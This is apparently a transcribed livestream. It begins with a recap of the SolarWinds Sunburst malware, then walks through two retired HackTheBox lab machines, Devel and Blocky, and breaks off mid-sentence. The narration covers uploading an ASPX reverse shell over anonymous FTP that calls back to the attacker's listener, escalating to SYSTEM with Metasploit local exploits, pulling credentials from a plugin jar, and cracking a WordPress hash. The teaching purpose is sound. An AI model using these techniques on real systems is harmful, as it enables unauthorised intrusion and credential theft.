Good morning, everybody. My name is Taggart, as it says right there. You can follow me on Twitch, Twitter, and GitHub is the only other thing I really use. But you can do it right there. And welcome to Hacky Boxing Day, also known as Saturday Hacker Day, here on this channel. We're going to be doing some cool stuff. We're going to be moving on from what we did in the last few weeks, right, with advent of cyber, and we're going to actually apply those skills to a real challenge on a different site, not try hack me. We're going to do something on a slightly more old school site and see how we do. But before we get into our usual programming, we always have the start of the show with This Week in Cyber. And so this week we don't have a whole lot of news for you, just a little update on the SolarWinds Microsoft FireEye fiasco, I think is the proper term for what we're dealing with there. And the only real update that we have is that Microsoft researchers have since announced that there was a second piece of malware that was delivered via the Sunburst compromise. Now, just as a review, what we know about the Sunburst compromise is that attackers, probably Russia, probably APT29, or what FireEye refers to as UNC2452, were able to enter the SolarWinds environment and compromise the source code of the build system, compromise the source code of the SolarWinds Orion platform and inject code into it that opened up backdoors for them to deliver whatever malware that they wanted, including something called Teardrop. Now, Teardrop is a dropper. It runs in memory, so it's very, very hard for endpoint detection and response, or EDR, or certainly antivirus, traditional antivirus, to find it. And that's because those tools are looking at the disk primarily. There are some advanced tools that are looking for process injection and kind of looking at real time what's going on in the system. But anyway, Teardrop is an in-memory runner that is very difficult for EDR to detect for those reasons. And this week, Microsoft announced that Teardrop was likely used to deliver a second payload called Supernova. And what is Supernova? Well, Supernova is just, they have all these cool names that they come up with, and that's just marketing, right? Big picture, Supernova is a web shell. And what is a web shell? A web shell is a file, usually, although in this case it looks like it actually was running in memory, which is pretty cool. But a web is a file that is accessible via a web browser or an HTTP request to the server, and presents an interface to the attacker that allows the attacker to run arbitrary commands on the victim system. And so, we've done a lot of reverse shell on this channel, but a web shell looks a little bit different. In many cases, it looks just like a web page with a text input, and then you press enter and it'll run whatever you want it to run. Depending on how they're built, they can be a little bit harder to detect, and they can reside for a long time, especially on systems that are not carefully monitored. So, for example, one really scary one is if you have a website that has file uploads, and in the file upload there isn't a good check. We actually just did this 2 days ago, right? If you have a file upload vulnerability and they're not checking for what kind of files you can upload, you can upload code that the web server can execute, like ASP or PHP, and then all of a sudden you have the ability to execute arbitrary code on the system, right? And you can just leave that page there. And what's really scary about web shells as opposed to reverse shells is the possibility for persistence, right? With a reverse shell, you've got to maintain the connection, right? You got to have that session open and running. But with a web shell, as long as the file's still there and no one's really checking for it and it hasn't been caught by antivirus or anything, you can just visit that page whenever you want. So you can imagine that's a little bit of a scary thing. So it turns out, according to Microsoft research, that the Sunburst compromise was used to add this web shell to certain systems, in SolarWinds in particular. And we've also added to the list of victims. I think NVIDIA is now on the list, a few others as well. The list keeps growing. But the meat of the story is still the same, that there was the DLL compromise, and that allowed all of these other avenues of attack to open up. All right. With that bit of the cyber news out of the way, let's start talking about what we're doing today. So we're going to head over to HackTheBox. Now, if you haven't done HackTheBox before, it holds kind of a special place for me because HackTheBox was one of the first places where I started to learn these skills. But here's the trick. I was not successful at all the first time I kind of ran up against HackTheBox. And in part, that was because I wasn't ready for it. And in part, it was because the culture of HackTheBox is, at least for me, not super helpful. The HackTheBox culture is very much aligned with kind of the OSCP, the Offensive Security Certified Professional certification. And the whole idea is like try harder, which, okay, that on its face is a perfectly fine thing, right? Try harder, always look for another avenue, don't give up. That mentality is fine. What it becomes, especially in the HackTheBox community, sometimes, and certainly if you read like the comments and the forum conversations, is we won't help you. You should help yourself. And that's fine so far as it goes, but as a teacher, sometimes the learner doesn't know the right questions to ask. And that's a problem, because if you're trying to make them totally self-sufficient, like if they don't know the questions to ask, they will just stop. There's no way forward for them. And so there has to be a balance between building self-reliance and that persistence, right? To keep trying new avenues of attack, researching the things that you don't know, and providing guidance when people really don't know the right questions to even ask, right? And depending on where you are when you begin your HackTheBox journey, that may be a little bit off-putting. It's actually one of the reasons why I really enjoyed Try Hack Me, is because the community is a little bit more supportive in that way, and also the rooms are a little bit more didactic. They're a little bit more educational. But that's not to say that HackTheBox is without value. the HackTheBox machines are very authentic, right? Sometimes they're a little CTF-y, but there are a lot of vulnerabilities that the HackTheBox machines are built around that you're definitely going to encounter in real life. This is true for both attackers and defenders, by the way. I really do enjoy the offensive side of this, but I find that in my day job, I'm a much better defender because I understand what the attackers are going to be doing. So with that said, let's head over to Hack the Box and get going. And we're kind of going to be doing this from scratch because I haven't set up my Hack the Box stuff on this Kali machine. All right, so here I am at hackthebox.eu, and I'm going to just quick log in here. And we will use the new design. I don't like it so much, but we're going to use it today for reasons. So that we can get used to it. Now, I believe that I'm going to need to download my access, but let's see. We're going to go to play machines. And while we're loading that up, I'm going to go ahead and cd documents. I'm making, so let's see. I'm going to make a new folder for Hack the Box and rename this tmuck section for Hack the Box. And we'll do the same sort of setup that we usually do, where I split the screen and then I split this screen a little bit as well, just because this will run the VPN connection. And this will do anything else that I need, right? Enumeration, shell maintenance, any of that good stuff. Okay, I'm going to skip the tutorial, and let's see what we have here. So we're going to do retired machines. In fact, by the terms of service, we can only do the retired machines on Hack the Box because the active machines don't have write-ups, right? They're still secrets. So we're gonna play with those a little bit. Now, I have I'm a paid subscriber to Hack the Box, which is why I'm gonna see the VIP retired machines here. It matters. Having access to these machines is actually super fun. So and valuable. So I'm gonna do a super easy one. As you can see, I've done this one before, but this is just a warm up. And I don't remember these, so it'll be like I'm doing it for the first time. So let me go over to my profile here. Is that where I can download the access keys? I have to download my VPN package. And they're not making it super easy to find this thing. Okay, introduction to VPN access. Wow, that's really annoying. So I'm gonna go over to Hack the Box Classic and find it. This is a problem, guys. I shouldn't have to work this hard to download my connection pack. Okay, I will put this in my. Now that I found it in the classic view, I've got my OpenVPN package. I've downloaded it, and now that I'm here, I can go back into our retired machines. That was not a great user experience. Something to call them out on. And maybe I was doing something silly and missing something obvious, but if I was, that's still kind of not entirely my fault, right? Because if the UI doesn't guide me to the most important thing that I need for connection, we have a problem. All right, let's, you know what? We don't do Windows machines too often. Let's go after a Windows machine. So let's do this Devel machine here. So I'm in my terminal. I'm going to make a new folder called Devel. And in my VPN window, I'm going to connect to the VPN. Oh, right. Also, music is a thing that we can have. I'll keep it, you know, not too loud. Chat, you can let me know if you don't like the music or whatever. All right. Let's go to work. So we're going to just, I want to click into this machine entirely so we can see all the details of it. All right, we'll turn it on. And let's look at statistics. This is cool. So in HackTheBox, it'll tell you, you know, what's it like. It's very much CVE related. It's, you know, users have rated it that it's somewhat realistic. And what do we need to do? A lot of user, a lot of discovery and enumeration, not so much custom exploits, and it's a little CTF-y. Okay. And the IP address is 10.10.10.5. Let's just confirm that we can talk to it. We can. All right. The old familiar rituals. We're going to start with my favorite, which is Rust scan. And then we're going to send that to nmap, do ss-a, and output xml, devel.xml. All right, 21 is open, 80 is open. That's interesting. So we've got FTP and we've got a web server. I might right away start looking at FTP. Okay, Microsoft FTP service. Okay, I can't log in anonymously, unfortunately. So we'll see what else we can do. For those of you who celebrate Christmas, I hope your Christmas was enjoyable, but also safe. I hope it was safe. I don't want anybody having, you know, broken quarantine or broken lockdown. All right, well, let's take a look at this website. See what we have there. Okay. IIS 7. Interesting. Now, we may consider, once Nmap finishes, we may consider doing some enumeration there. Because even though there's a default IIS page, there's no guarantee that that's all that's there, right? The other thing that we might think about is, and this is just because of how HackTheBox works, is there a documented vulnerability for that version of IIS? So I might do something like search exploit IIS 7. Okay, so there is there's a denial of service attack. I don't care about that. Let's just search for IIS, see if we get anything else. Nothing super crazy just yet. But we might not know enough. More enumeration to do. But this thing's taking its sweet time heading over to Nmap. I might just run Nmap straight on it. See if that does any better. You can also see the tags here, where there's Windows, FTP, and arbitrary file upload. That's interesting, right? If there's a vulnerability in FTP, it's entirely possible. Yeah, there we go. Nmap finished. So, okay, so it is IIS 7.5. That's interesting because we saw there was an exploit for IIS 7.5. Wasn't there? FTP service unauthorized remote. Okay, so this is promising, right? So let's see what is going on there. We're going to use search exploit again, if I can spell it. Doesn't seem promising. Wow. Okay. Oh my god. But what we're going to do is we're going to use the tac x, or the -x, and we're going to inspect, or this examine. Okay, so that's just a bunch of shellcode. Okay, but this is denial of service. I don't want denial of service. That's not helpful. That's not good for me. So since we don't want a denial of service, and there didn't seem to be anything else really for 7.5, maybe this FTP server and LST response overflow. Let's see what this is all about. Okay, so this is a Metasploit module. Now, I should mention that the HackTheBox culture really frowns upon using Metasploit to complete the challenges because they're going after a specific certification, right? The OSCP, the Offensive Security Certified Professional Certificate. And you can't use Metasploit during that exam. Now, I have mixed feelings about the OSCP, and I think that Metasploit is an important skill. And I think that understanding how it works is also important, which is why we can look at the Ruby source code here. But as long as you understand what Metasploit is doing, and that does matter, it's an automation tool otherwise, and, why not? Okay, so this is a buffer overflow. Okay, well, we could give it a shot, right? Especially since it is a Metasploit, module. So I've got Metasploit up and running over here in my other Tmux window. So I'm going to search for IIS. Okay. I think this is it right here. Okay, so now that we've gotten to the actual module, let's look at the info for it. Okay, response overflow trigger. Okay, it creates a heap overflow when processing a specific craft object. The issue can be triggered pre-auth and in fact may be exploitable for remote code execution. Yeah, but maybe is problematic, right? I feel like this is as likely to bring down the system as it is anything else. So we're going to hold off on that and go back to the thing that we haven't done yet, which we absolutely should, which is, whoops, wrong window, enumerate the system, right? We haven't actually done that on the website, which we absolutely should. So I'm going to run Ferox Buster against it, and we'll do easy mode first, right? Which is going to be 10.10.10.5, and we'll use the word list from derb. And yeah, see how that goes. Okay, so that's pretty valuable for me to know. So it's an IIS server, which isn't, we knew that already, but we now know that there may be ASP files running on it. So that's useful as well. I'm gonna then move over to dirbuster and directory list 2.3 medium. We'll see how that goes. It's a much larger list. Meanwhile, over in this other window, I'm going to check to see if there's anything for, because it says FTP, right? So I'm going to search exploit Microsoft, and then I'm going to grep that for FTP. Okay, so this is the one I think we found before, right? Windows FTP server. Let's, what version was it? Oh, you know what? I should have that in my nmap information. Wait a minute. It says FTP login allowed. Well, crap. What did I do wrong? Send identity. Oh, it says anonymous access. Did I misspell anonymous? Yeah, I did. Okay, so we do have FTP access. Well, that's handy. All right, let's see what we got. There's a whole bunch of stuff of an ASP.NET client. There's command asp.aspx. There's nc.exe. There's shell.aspx. Some of this I think is from other people who are attacking the system. Definitely shell.aspx is, but we're not going to use that. All right, I'm going to stop the enumeration of the web here because we have a way in. This is actually perfect. Speaking of web shells, we're going to make one. Well, not really. We're going to make a reverse shell. but we could make a web shell. So what we're going to do is we're going to do MSF Venom, right? And with MSF Venom, what we're going to do is instead of making, we've used it to make interpreter shells, we've used it to make PHP shells, but we've never done an ASP shell. So let's look at how that works. First, we're going to list payloads, and we're going to grep for ASP, just to see what we have available for us. Okay. I was really expecting something there. Well, you know what? If MSF Venom's list doesn't work, we can always do this. Thanks, the Goog. Okay, so it's Windows shell reverse TCP, and then the format. Nope, don't want to do that. Alright, well, here's a reverse shell that we can use, which is fine. You know what? I'm just being dumb. Okay, so what we're gonna do is we're going to create a reverse shell using the Windows payload. That was why we couldn't find it, because ASPX is a format, not a payload. Yeah. So we're going to MSF Venom. The payload is Windows x64 shell reverse. Actually, can I get an interpreter going? Yes, I can. Why not, right? If we can do it, we can do it. So let's make the interpreter shell our payload. Okay. The format is going to be ASPX. Okay. Now we have to provide it some options. Let me split the window here, and let's get my IP address on the network, 10.10.14.7. So that's going to be the L host, 10.10.14.7. The L port, which is what we're listening back on. I always like to use 8888. And the output is going to be mt.aspx, because that's what I use in these. It's handy because it's my initials, but it's also for interpreter. Okay, while that's MSF Venoming, I'm going to go over to the Metasploit framework and set up my listener with use exploit multi handler and set up my options. So the first thing I need to do is change the payload. So I'm going to set the payload to Windows x64 interpreter blah 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 blah. Will that autocomplete for me? Yep. interpreter reverse TCP. Thank you. Set L host to, what was it, 10.10.14.7? Yes. 10.10.14.7 and set L port to 8888. I don't know why I capsed one of them and not the others. Okay, that looks good. And we'll run that as a background job. So we'll just let it run. Okay, so have it listen. And let's go over to here. So I've got mt.aspx. Do I still have my FTP connection? No, but I can get it back. Log back in as anonymous. By the way, so it says anonymous access allowed, send identity, email name as password. I think you can just do anonymous, but old school, what we used to do is user@domain.com, and that's still what I put in. Okay, so here's the thing. iisstart.htm, this tells me that I am currently FTP'd into the web root of the web server, right? This is the HTML file that I'm looking at when I visit this thing on the web, right? If I go to 10.10.10.5, this file is iisstart.htm. So I can put other stuff in here and then access it with my web browser. That's the problem. And indeed, I'm going to do that. So I'm going to put mt.aspx. Right? And turns out I was able to upload it. There it is. And I can go visit it. All right. And with any luck, sorry, I wasn't trying to zoom that. I'm trying to go over here. Okay, well, something went wrong. Let's see. Did I get my IP address correct? This is my tunnel, 10.10.14.7. That's correct. Oh, snap. I still have my try hack me VPN running. That's very funny. I should probably kill that right now. But it was two separate tunnels, so that shouldn't have mattered. You can see, like, I didn't upload this command to ASPX. Other people did. This is old enough that the problem might be the architecture. So what I'm gonna do is I'm gonna rebuild it, but I'm gonna rebuild it for 32-bit. We'll see how that goes. Was it just Windows? Yeah, there we go. Okay. So it said no arch selected, selecting x86 from the payload. We're going to do put mt.aspx. Okay, up it goes. There it is. There's our interpreter session. All right, so we've got a reverse shell from the ASP. Let's look at sessions 4. Okay. That's a lot of stuff. I'm gonna CDC. Now, an interpreter gives me the ability to like do some navigation. Right, so I can do this without dropping into a Windows command prompt if I don't want to, which is handy. All right, so we've got like default. There's a Bobus user. Can I read what's in there? No, I can't. This thing is old enough that like let's drop in here. Let's do sysinfo. Oh my god. Well, it tells us that it's Windows 2009. Let's do the usual stuff. Net user. Okay. And who am I, actually? I should be the IIS service user. And what can I do? This is Windows enumeration 101, right? What can I do? I can impersonate. That's great news. On Windows, if I can impersonate other user IDs, then I've got a lot of options. All right, so from here, let me back around this channel. Now, the next thing I'm going to do is a little noisy and would normally get me caught, but since this is a Windows 2009 system, I'm less concerned about it. Interpreter has a get system command, so I'm going to just fire it off and see if I can get this going. This is also the part where the OSC people are like, you can't use Metasploit and Interpreter because this is easy mode, which is fair. But it's using the same tools that we could use otherwise, right? We could load Mimikatz and like get the hashes and all the other stuff. Okay, so this didn't work anyway. So we're gonna have to try something else. All right, so let's see here. Where are we? So I can't read Bobus. Sucks. I don't think I can read administrator. No. So I'm basically going to have to get... I don't have any credentials on this at all, so I'm going to have to get root anyway. So I'm going to background the session, and I'm going to use post. Actually, let me just search for suggester. Right, so I'm going to use this, use 0, post multi-recon local exploit suggester. Okay, and set my options. Sessions, set my session to 4, and see what we got. I'm really glad that we have, so a lot of times the exploits that this will recommend, you know, if there's an architecture mismatch between the shell that it's using and the exploit it will attempt next, it's really problematic. But luckily, we don't have that here. Okay, so we have a lot of choices in terms of things this could be vulnerable to. And this is enumerating just based on Windows version and registry entries that it's finding. Here, let's try the UAC bypass. So I'll say use that one. And then I'll go to options. So it's going to run on session 4. And then it's going to, session 4, it's going to create a second reverse shell back. So I have to give it the same options that I did before. So set lhost 10.10.14.7 and set the L port to 8889. And again, if we were doing this during a real pen test, we might be a little stealthier with that. We might run it on 80. We might run it on 8080, right? Or something that just looks a little bit more innocuous. All right, let's fire this off and see what happens. I don't have a lot of success with this one, even on old machines. Yeah, not an admin's group cannot escalate with this module. So let's try Shellevator. I do a little bit better with this one. And let's actually read the info on this one too. Close 2010. Close. Okay. Exploits task schedule XML 0 day exploited by Stuxnet. Oh, really? Cool. All right. Same deal. Let's set the L host to 10.10.14.7. Let's set the L port to 8889. And let's set the session to 4. And show targets. Yeah. System cannot find the file specified. Well, that's upsetting. All right, no luck there. This one looks interesting. Secondary logon handle privilege escalation. And it's new-ish. This module exploits standard handles in Windows secondary logon service. The vulnerability is known to affect versions of Windows 7 through 10 and 2008 to 2012, 32 and 64-bit. Will only work against those versions of Windows with PowerShell 2 or later and systems with 2 or more CPU cores. It's a VM, so maybe. We got it. We have a system shell. Pretty cool, right? This thing's always a little bit interesting. So if I go to sessions 4, it said exploit completed, but no session was created. Sucks. That's annoying. Well, keep going. So we just tried this one. We'll try the reflection vulnerability. Okay, first of all, we're going to set the payload to Windows Interpreter reverse TCP, rather than the one with the slashes, because we want it to be unstaged rather than staged. Okay, set lhost 10.10.14.7, even though there's obviously no AV on here, because otherwise we would have been popped a long time ago. Set session 4, and go. It worked. So this one, let's look. So it didn't actually get me a system shell, did it? What I have is a different shell as the same user. Right now I'm listing the processes. And I'm going to try to migrate the process. Cool. Okay, this one's working fine. So I could try to migrate the process, but oh, this thing's ancient. PowerShell 1. I can't migrate it to anything that does a different user, so it's not really that helpful. Ooh, and my session died. Wait, no, session 5 died, which is fine. I mean, this shouldn't matter, but just in case it does. Yeah, I can't run anything because I don't have a system. Okay, so I have some other options here. Let me get out of the FTP here. And let me bring up another split here. This track is distracting me. If I go to scripts, do I have WinNum yet? Oh, I don't. Okay, well, I have WinPeas. So let's I want WinNum. I really do. Yeah. prefer to do this one, so I'm gonna grab it. Yeah. So this is just a batch shell, or batch script that will allow me to enumerate vulnerabilities on the system. So sessions 4, and where am I? I can't go, okay. Go into the temp folder. Okay, can I upload here? Home, it's Taggart scripts, winnynoom.bat. Yes, okay. Grab a shell there, and let's run winnynoom.bat. Okay, nothing happened. Fine. Let's upload empty taggart win peas. Nope, scripts. Win peas. Oh, just peas. And then win peas. Win peas. Let's run the batch script. Peas.bat. Okay, let's run winpeas.bat. Alright, it's doing its thing. You can see how thorough WinPeas is. This is one of the reasons why I didn't necessarily want to do it. It's because it's so crazy. Yeah, I don't think this is going to be super helpful. So we'll background this, and let's run that exploit suggester again. Is there one of these that I'm forgetting about? Yes, there is. There's a Windows exploit suggester, which will be... This is Python, though. I doubt very much if there's Python on this machine. Alright. Let's try KitcherPod, even though it said the service is running, but it could not be validated. Let's look at the info for this one. Create a new session with system by the KitchenPod exploit by Tabis. All right. If the session is in use already elevated, then the module relies on KitchenPod.x86 is not supported on x64. Okay, well that's fine. We're using a 32-bit system. So it's a DLL issue. Set lhost 10.10.14.7. Set lport 8889. Let's see, show targets. Okay. And set session port. Looks like we have everything ready to run. Go. No! Just as we were about to do it, our session died. Disappointing. Okay. Well, we're going to have to use exploit multi-handler again. All this is correct. We're just going to run it as a background job again. And go visit our ASPX shell again, which it should still be there. Yep, we got our interpreter session back, which is great. And I can use the previous command to get back to the previous exploit that I was using. How handy is that? Now, let's see. Everything is still set correctly here, except I have to set the session now to 6. And run it. Hey! Son of a... Man. I'm still IIS at Pool Web. Cannot get past it. That's really interesting. Although, I have a whole bunch more properties now. I have a whole bunch more abilities now than I did before. You see that? I've got all these enabled. Yeah. This probably won't work. Yeah. Yeah. All right. Well, now I'm a little stumped. So let's see. We can't seem to get past... I can't even get the user flag. We have a shell on here. Well... Yee. Alright, well, let's get a stabler shell anyway. We can at least do that. So what we're going to do is turn this into an executable and run it on port. This one we will do on like 9999. And we'll call it mt.exe. So what we're doing here is we're making a new reverse... Oh, crap, that's wrong. We're making a new reverse shell. But we're making an executable file. The reason we're doing that is so that we don't have to rely on the ASP shell. And in Metasploit, we're going to upload... Oh, first of all, I'm going to C. Did I do this already? Yeah, I got to go C, Windows, temp. You might notice I'm using the forward slashes. I can do that in the interpreter shell if I want to. And it'll put me in the right place. See? I'm going to upload documents, HTB, devel, and mt. Whoa. What the what? Where is it? Oh. Move that to documents, HTB, devel. There we go. Put it in the wrong folder, which happens. mt.exe, and I got to background this guy. And I gotta change this up. I gotta set the payload to Windows interpreter reverse TCP and set lhost to... Nope, actually lhost is fine, but the L port has to be 9999 and run -j. Run that as a background job, so I'm listening for my new incoming connection. I've got session 7. And let's get back into a Windows shell here. And there's mt.exe, so I'm going to run that. And I got another session. Okay. Right, you see I have this one. Shell. Who am I? I'm still IIS at pool web. Which is unfortunate. But now this connection should be a lot more stable. Okay. I am not the best at Windows privilege escalation. Oh, you know, we didn't do the Schlamperé one, did we? That might be one to try. Alright, let's try that one. The targets. Set lhost 10.10.14.7. Actually, let's look at the info for this. This module leverages a kernel pool overflow in Win32, which allows local privilege escalation. The kernel shellcode nulls the ACL for the winlogon.exe process. This allows any unprivileged process to freely migrate to winlogon.exe, achieving privilege escalation. That's cool. Okay, this seems promising. No screaming. Let's set the L port to 9998 and set the session. How many sessions do I have at this point? Yeah, set the session to 8. We'll run this on our stable shell that's not based on the ASPX. All right, run it. Freaking finally. All right, we have a system shell, which means we can actually look at stuff in here. All right, let's get into desktop on Babis. Okay, let's type user.txt.txt. Okay. There is the user flag. I have already submitted it for this machine, but if I wanted to, I could click submit flag right here. We'll do it. It really wasn't that difficult, all things considered. It was just a matter of enumerating the potential vulnerabilities. Yeah, it's not gonna. It already says like, you already own this. Don't submit any more flags. But because we're system, we can also just go look at administrator as well, and right, we can do desktop.txt. And there's the root flag. So we have rooted this machine. It took a minute, but we got there. And that is how we do HackTheBox. So we can do another one a little bit faster. I'm going to terminate this. Exit interpreter here. Sessions. Hey. Hey? Can I do all of them? Sessions. Okay, 7, 8, 9. Wait, did it make me have to relog in? But why? Weird. Okay. Let's turn that machine off and go try another one. How about a Linux machine? Yeah, there's deval. I want to shut you down. Okay. All right, let's try, God, there are a lot of... I don't remember Blocky. I don't have a lot of time, so now that we've done the kind of intro to Hack the Box, next week we'll do a new one that I haven't done. Although again, honestly, I was doing these in such a fugue state when I was studying for the EJPT that I honestly don't remember how these go usually. So every time it's like brand new for me. I do have notes on these, but they're not on... Oh, no, you know what? I did have notes on these, and then my Kali VM got ruined somehow, and I lost them. Alright, well, 10.10.10.37. Let's get a quick enumeration going here. Make a new folder here. Go over to it. You guys are quiet in chat. Remember, the point of this is to, you know, teach. So if you have questions or things that you want to see, ask. Well, that's good. Is that a French username? Is it Lesso? Parles-tu français? All right, let's get this going. Oh, well, you're very welcome. Obviously, with my name, I have a fondness for Scotland. I know about the show. Yeah, I can't do that. I can't do that R. I know that the Taggarts were a subclan of Clan Ross, and that my family pieced out of there 16th century-ish. It's the County Sligo in Ireland. All right, 21, 22, and 80. Interesting. 22 is, you know, we know it's a Linux box. 80, there's a web server. And 21, there's FTP, so we'll just try it. Debian. Okay. Password required for anonymous. I did spell it correctly this time. User@domain.com. Nope. We'll try it one more time with just anonymous. I don't think it's going to work, but... Because usually what it would say is anonymous login allowed, right? So don't think we're going to get that lucky. But let's go ahead and visit it on the web. Oh dear. I do remember something about this. I remember it being a huge pain. This is about... One thing that this can teach us is about being careful to read. what is actually going on. So it's not always just about, you know, typing stuff into the terminal. Sometimes you actually have to pay attention to the human element, and this is one of those times. So welcome everyone. The site and server are still under construction, so don't expect too much. We are currently developing a wiki system for the server and a core plugin to track player stats and stuff. Lots of great stuff planned for the future. Okay, well, let's leave the terrible writing alone. It's a WordPress site, which, you know, we can know based on the shape of it, but we also have Wappalizer going, so it can tell us here that this is WordPress 4.8. Okay. That's fun. And that's old enough that there may be some issues there. And let's see if it's just like WP plugins is innumerable. Is it not? See if WP includes is enumerable. It is, okay. So that sucks for them, but it's great for us. So WP includes, right, is a WordPress directory. It should not be enumerable, or it shouldn't be indexed. Apache should not have directory indexing enabled, but it is, and so there's a lot that we can learn from here. Oof. Oof. Boy, there's going to be a lot to work with here. Okay. Simple Pi. Interesting. So I'm kind of sniffing out WordPress maybe a vector. That's kind of my first thought. But we haven't done everything yet. What the hell is that? 2560 25565. Wonder what's running there. This may be a Minecraft thing. You know? But yikes. Okay, do I have WP scan on here? I do. Alright, so because this is a WordPress site, what I'm going to do is I'm going to do a WordPress scan. And is there any way around this that doesn't include revealing my API key? Not really. So it is what it is. Please don't abuse it. Let me go get it over here. Okay, so WP Scan, very, very cool tool. This is specifically designed to enumerate vulnerabilities and plugins on WordPress. I'm going to enumerate all plugins, and I have to give it my API token. There's a free tier, which I'm using, which gives you like 50 requests a day or something like that. It's pretty generous. Again, please don't abuse this. And I have to give it the URL, obviously, which should be 10.10.10.37. We'll see how that goes. Did I mean UA? No, I didn't. I meant _URL. Okay. So off it goes. And it's going to start enumerating the WordPress site. Okay, so you can see already it's finding vulnerabilities. Man, that was quick. Okay, so let's see what we got. Got misuse of set screen option leading to privilege escalation, disclosure of password protected page posts and comments. That's interesting. We might want to play with that. Authentic cross-site scripting. A word on cross-site scripting, because in these kinds of challenges, they are not actually that useful, but in real life, good lord, are they. And I think that they're downplayed in terms of their severity. I play a lot with cross-site scripting at work, and the truth is that if you have a cross-site scripting, especially a stored cross-site scripting vulnerability where arbitrary JavaScript can get executed on the page, on these one-on-one engagements where it's just me against the server and no other users are interacting with it, it doesn't matter as much. But if I have other people like administrators who are actually accessing the site where I've added a stored cross-site scripting exploit, I have a lot of options, right? I can capture a lot of information from those users. I can and take over their browser session, right? If the cookies aren't stored correctly, I can impersonate them. I can steal their cookies. So just a quick soapbox on cross-site scripting. Don't downplay it. These challenges don't always necessarily represent everything that you can really get up to in a real engagement where other people are in play. Okay, this is cool. Unauthenticated users view private posts. Well, we're definitely going to be using that. Password reset tokens fail to be properly invalidated. Another cross-site. SSRF. That's interesting. I think we need to be authenticated for that one, though. There's a lot of view private draft posts in here. File upload to cross-site on Apache web servers. Man. Whoa, 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 whoa. PHP object injection via metadata. I think we also have to be... Okay, there's a lot here. And it does the basic enumeration too. Meanwhile, you know what? My day job is VM2. But it is morphed, honestly, into threat hunting. Where because of the offensive stuff that we're playing with. So it's VM, but for a lot of the validations, we're doing threat emulation to see. We're not, necessarily trusting the automated scanning. We're not necessarily relying just on those sorts of tools. If we have something spicy, we are manually going in and testing it to see, with permission from the owners, but to see if it actually is vulnerable. Because a lot of times the automated scans, like even in enterprise tools, suck. They just do. Like, for example, I know that a lot of the Rapid7 validations are they're lazy. They just are. They're not looking for the right things to really validate the vulnerability. They're saying, oh, well, this version is vulnerable, but they're not actually doing the check that would really fingerprint the issue. Yeah, if you gain that kind of trust, I will say it's kind of interesting, because what ends up happening, or at least what's happening for us, is that the automated scanners, they give you a bunch of false positives, right? And like owners will look at that and they'll start thinking that it's always crying wolf, right? But when there's a crit and it's not a false positive, like going through and taking the time to do manual validation and threat emulation means that your owners end up trusting you more. So yeah, I know it's a hard permission to get, but the human payoff is really, really high. At least for us, at least the way that we're kind of designed the team, because we work directly with owners and they need to trust us, right? And if they don't trust us, then we're never going to get to a place where they feel good about patching and remediation. Okay, so there's something going on this 25565 port here, which is interesting. It says it's a Minecraft server. Which I don't know if we have any exploits for Minecraft, but we have a lot of stuff here for WordPress, so I think that's kind of where we're going to go. And let's see. This is, I think, the basic idea with a lot of the... Yeah, so see how it has this? Page 3. If I change it to post, does that work? No. It doesn't look like there's anything actually here. If we look at the... Yeah, if we look at the disclosure password protected page and comments, it'll actually tell us a little bit more about this. Our comments from it says comments from password protected posts and pages could be displayed under certain conditions. Interesting. Enumerating all plugins, no plugins found. Well, that's obviously not true. We have another tool that we can use. Where we have WordPress scanners. You know what? We forgot a step. We forgot to do our proper enumeration. There may be other stuff here for us to see that isn't, you know, we're getting locked in on WordPress here, but that might not be everything. So, let's run Ferox Buster. And let's run it against Derb first. There's phpMyAdmin running. That's, you know, different. Oh, see how there's a wiki? That's interesting. And that would be something that we would have learned from the post, right? Let's see if there's anything in the wiki. Just under construction. Oh, I set it to not recurse. I actually wanted it to recurse. So there's a plugins folder too, which is kind of cool. And yeah, Ferox Buster goes and does its drawing thing. And this starts happening because Ferox Buster is too fast. Okay. Well, we're obviously not going to be able to get into PHP My Admin. Okay, but we don't have creds yet, so that's not as useful. Well, let's see what's up in this plugins folder, right? And this is just plugins, right? Now we're getting somewhere. Okay. Okay. Time to look at some files. We're going to download these things. Now, as I recall, jar files are just glorified zip files, or are they glorified tar files? I think they're glorified tar files. And for that reason, we can extract, we can like unpack jar files, right? Yeah, so jar-x. So we're going to do that. Jar-x blocky core. And what we're hoping for is that there's something in, so this is a plugin that the developer used. So what we're hoping is that there's something interesting in here that we can make use of. There we go. I had to give it the TAC F option. Okay, well, let's look at the meta information. Nothing interesting in there. Let's look at my first plugin. BlockyCore.class. Kind of hard to read, so let's type it through strings. Oh, snap. This is the username, this is the password. This may well be how we get into PHP My Admin. You love to see it. Okay. Now that we're in PHP My Admin, where are we trying to go? We think about directionality here. I want a shell, and I know that WordPress will let me get one in a lot of different ways. So I want to get logged into WordPress. So let's go check out the WordPress database and look at WP users. Okay, so here we have a username of Notch, and then here's the user password. Now, this part is going to be fun. Yeah, we'll do this in the VM. It's like how much power I'm going to need for this. So we're going to vim notch.hash. And we're just going to paste that right in there. Now, is the password truncated? I do not believe it is. I just think that it's short. Yeah, it's not truncated. It's just short. So hashcat help rep case insensitive. I think there's a WordPress setting for hashcat. Nope. I think there's one for, is there one for PHP? Yeah, it's PHP pass, I think is what we want here. Or it's bcrypt. One or the other. Yeah, I think it's PHP pass though that we want. And so this is the format we're gonna throw to hashcat. And we'll throw it against RockU just to see what happens. Have I extracted RockU on this thing? If not, oh no. Okay, well let's quickly do that. If you notice that my shell changed, because the new versions of Kali use Z shell as its default, and I don't like it, so I use fish. Now, can I get? Oh wait, no, I do this every time. I used the wrong, there we go. I used the wrong commands to extract RockU. All right, so now we've got the RockU word list. We're going to use a brute force attack, which is A0. We're going to do the mode of 400, right? Which is what we got from hashcat. Yes. And we're going to give it the notch.hash, and we're going to give it the word list user share word lists RockU.text. This shouldn't take terribly long. I want to get out of here by noon. All right, it's going to work. Just as a sanity check, I'm going to run this against hash identifier. Yeah, okay, it's MD5 WordPress. And I'm just checking to make sure that there wasn't like another option here I could have given. No, I don't think so. Unless it was like... Yeah, no, don't think so. I think we're good here. Just taking its time. Again, just as a sanity check, let's do WordPress hashcat just to see. Ugh. Come on. Oh no, it is 400. We got it right. So this is taking forever. I mean, not really, in terms of password cracking. But it's not, you know, the fastest. And in part that's because, you know, this VM is a little underpowered. I gotta power it up a little bit. But just in case, I'm gonna bring up my actual this is my Windows subsystem for Linux VM. Or not VM. Actually, yes, it is a VM, but it is directly tied into the Windows host. And so I have my good graphics card available here. So let's try. Yeah. So I'm gonna run hashcat here as well. And do I have sec lists on here? I think I do. Yep. I have it through. Was it just in word lists? Spelling? No. Did it? No, it's definitely in 